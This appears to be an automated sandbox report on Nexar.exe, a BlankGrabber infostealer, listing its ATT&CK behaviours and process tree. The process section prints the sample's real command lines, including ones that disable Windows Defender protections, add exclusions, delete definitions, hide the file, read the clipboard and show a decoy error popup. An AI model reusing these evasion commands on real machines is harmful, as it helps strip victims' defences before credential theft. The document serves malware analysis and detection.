Malware Analysis Report

2024-12-01 03:11

Sample ID 241111-q7bglsyqa1
Target Nexar.exe
SHA256 e107b2a22642b7d3e4637d7530745f9e557cf979d3710136729eb5bad060928c
Tags
blankgrabber collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e107b2a22642b7d3e4637d7530745f9e557cf979d3710136729eb5bad060928c

Threat Level: Known bad

The file Nexar.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Clipboard Data

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

UPX packed file

Enumerates processes with tasklist

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Gathers system information

Detects videocard installed

Views/modifies file attributes

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 13:53

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 13:53

Reported

2024-11-11 14:03

Platform

win11-20241007-en

Max time kernel

600s

Max time network

593s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Nexar.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133758068608764568" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3144 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Users\Admin\AppData\Local\Temp\Nexar.exe
PID 3144 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Users\Admin\AppData\Local\Temp\Nexar.exe
PID 4844 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4196 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3752 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3752 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4748 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4748 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3476 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3476 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 5012 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5012 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 644 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 644 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4844 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 1876 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1876 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4844 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 796 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 796 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 2184 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2184 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1032 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2176 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4844 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1984 wrote to memory of 128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1724 wrote to memory of 4696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1724 wrote to memory of 4696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4844 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Nexar.exe

"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

C:\Users\Admin\AppData\Local\Temp\Nexar.exe

"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again', 0, 'Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again', 0, 'Error', 0+16);close()"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexar.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

